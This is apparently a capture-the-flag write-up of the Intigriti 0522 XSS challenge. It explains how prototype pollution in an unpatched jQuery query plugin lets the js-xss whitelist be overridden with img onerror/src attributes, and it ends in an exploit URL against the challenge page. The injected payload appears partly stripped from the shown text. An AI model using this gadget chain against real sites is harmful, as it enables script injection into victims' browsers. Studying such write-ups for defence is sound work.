-----------------------------------------------------------------------------
| Date: 02-06-22
| Challenge: https://challenge-0522.intigriti.io/challenge/challenge.html
.-------------------------------------------- ---- ----
|Challenge description:
| Find a way to execute arbitrary javascript on the iFramed page and win Intigriti swag.
| The solution...
| - Should work on the latest version of Chrome and FireFox.
| - Should execute alert(document.domain).
| - Should leverage a cross site scripting vulnerability on this domain.
| - Shouldn't be self-XSS or related to MiTM attacks.
| - Should not require any kind of user interaction. There should be a URL that when visited will present the victim with a popup
| - Should be reported at go.intigriti.com/submit-solution.
\
\
//----------====-----=_-___===__==-------- -- - -
|| First observations :: dynamic ::.
\\----------==-----=_-___===__==------ -- --- -- -
|
| https://challenge-0522.intigriti.io/challenge/challenge.html?page=1
| I started by playing around with the page variable in the url
| try page=2, page=2 etc etc.. diferent pages are displayed.
| I Descided to fired up burpsuite and setup a intruder attack counting from
| 1 ... 100 while I have a look at the source. After starting the attack I
| notice that all responces are having the same lenght, so I stop the attack,
| check the source and realize:
| "LOL.. Ok Ok.. Haha, this challenge is pure frontend."
\
/
//----------====-----=_-___===__==-------- -- -
|| First observations :: static::.
\\----------==-----=_-___===__==------- ---- --- -- ---
| The Url is parshed the value'page' variable is used to select page content from 'pages'
| parshing of the url is done by Jquery.query included in the code of challenge.html
| the selected content is passed through filterXSS before writen to the innerHTML
| of together with pages[4] what contains the dropdown menu.
| ________________
| | challenge.html \
| |------------------------------------------------------------------------------
| | 0371 | var pl = $.query.get('page');
| | 0372 | if(pages[pl] != undefined){
| | 0373 | console.log(pages);
| | 0374 | document.getElementById("root").innerHTML = pages['4']+filterXSS(pages[pl]);
| | 0375 | }else{
| | 0376 | document.location.search = "?page=1"
| | 0377 | }
| ------------------------------------------------------------------------------
\
/
//----------====-----=_-___===__==-- -- -- - -- --- -
|| ReCon For TH3 Win ::.
\\----------==-----=_-___===__==------ ----------- ----------- -------
| a little recon leads us to the following git repository
|
| https://github.com/alrusdi/jquery-plugin-query-object
| and I notice the follownig pull request :
| ____________________________________________________
| | Merge pull request #25 from IcanBENCHurCAT/master
| | Preventing prototype pollution
| | https://github.com/alrusdi/jquery-plugin-query-object/commit/7fe56513df0256b4d6d307c930d43cb85bd80eae
| ---------------------------------------------------
|
| comparing changes with the code in challenge.html and we can conclude that the
| the code in the challenge is still vulnerable.
|
| ________________
| | challenge.html \
| |------------------------------------------------------------------------------
| | 0371 | var pl = $.query.get('page');
| | 0372 | if(pages[pl] != undefined){
| | 0373 | console.log(pages);
| | 0374 | document.getElementById("root").innerHTML = pages['4']+filterXSS(pages[pl]);
| | 0375 | }else{
| | 0376 | document.location.search = "?page=1"
| | 0377 | }
| ------------------------------------------------------------------------------
|
| A search of "js-xss prototype polution" leads us to the following page:
| https://github.com/BlackFan/client-side-prototype-pollution/blob/master/gadgets/js-xss.md
| that points out the potential vulnerable code at line 0588.
| _______________________
| | xss.min.js::formatted \
| |------------------------------------------------------------------------------
| | 0580 | function FilterXSS(options) {
| | 0581 | options = shallowCopyObject(options || {});
| | 0582 | if (options.stripIgnoreTag) {
| | 0583 | if (options.onIgnoreTag) {
| | 0584 | console.error('Notes: cannot use these two options "stripIgnoreTag" and "onIgnoreTag" at the same time')
| | 0585 | }
| | 0586 | options.onIgnoreTag = DEFAULT.onIgnoreTagStripAll
| | 0587 | }
| [[0588]] options.whiteList = options.whiteList || DEFAULT.whiteList;
| | 0589 | options.onTag = options.onTag || DEFAULT.onTag;
| | 0590 | options.onTagAttr = options.onTagAttr || DEFAULT.onTagAttr;
| | 0591 | options.onIgnoreTag = options.onIgnoreTag || DEFAULT.onIgnoreTag;
| | 0592 | options.onIgnoreTagAttr = options.onIgnoreTagAttr || DEFAULT.onIgnoreTagAttr;
| | 0593 | options.safeAttrValue = options.safeAttrValue || DEFAULT.safeAttrValue;
| | 0594 | options.escapeHtml = options.escapeHtml || DEFAULT.escapeHtml;
| | 0595 | this.options = options;
| | 0596 | if (options.css === false) {
| | 0597 | this.cssFilter = false
| | 0598 | } else {
| | 0599 | options.css = options.css || {};
| | 0600 | this.cssFilter = new FilterCSS(options.css)
| | 0601 | }
| ------------------------------------------------------------------------------
\
/
//----------====-----=_-___===__==-- -- -- -
|| Exploitation :: :: :: ..
\\----------==-----=_-__--_===__==------ -------
|
| We can write our own whitelist options to the prototype
| this will be included into new object. I will create a whitelist with
| ![]()
tag with "onerror" and "src" attributes.
|
| __proto__[whiteList][img][]=onerror
| __proto__[whiteList][img][]=src
|
|
| We cannot simpley add to the "pages" list, but we can write to the prototype
| so lets add a value there.
| __proto__[pwn]=
|
| and no we just select our payload as page by setting the "page" variable to pwn
| page=pwn
----------------------------------------------------------------------------
//
//----------====-----=_-___===__==-- -- -- -
|| SOLUTION :
||
|| https://challenge-0522.intigriti.io/challenge/challenge.html?__proto__[whiteList][img][]=onerror&__proto__[whiteList][img][]=src&__proto__[pwn]=&page=pwn
||
\\----------==-----=_-__--_===__==------ -------
Happy Hacking,
-xXx- M42D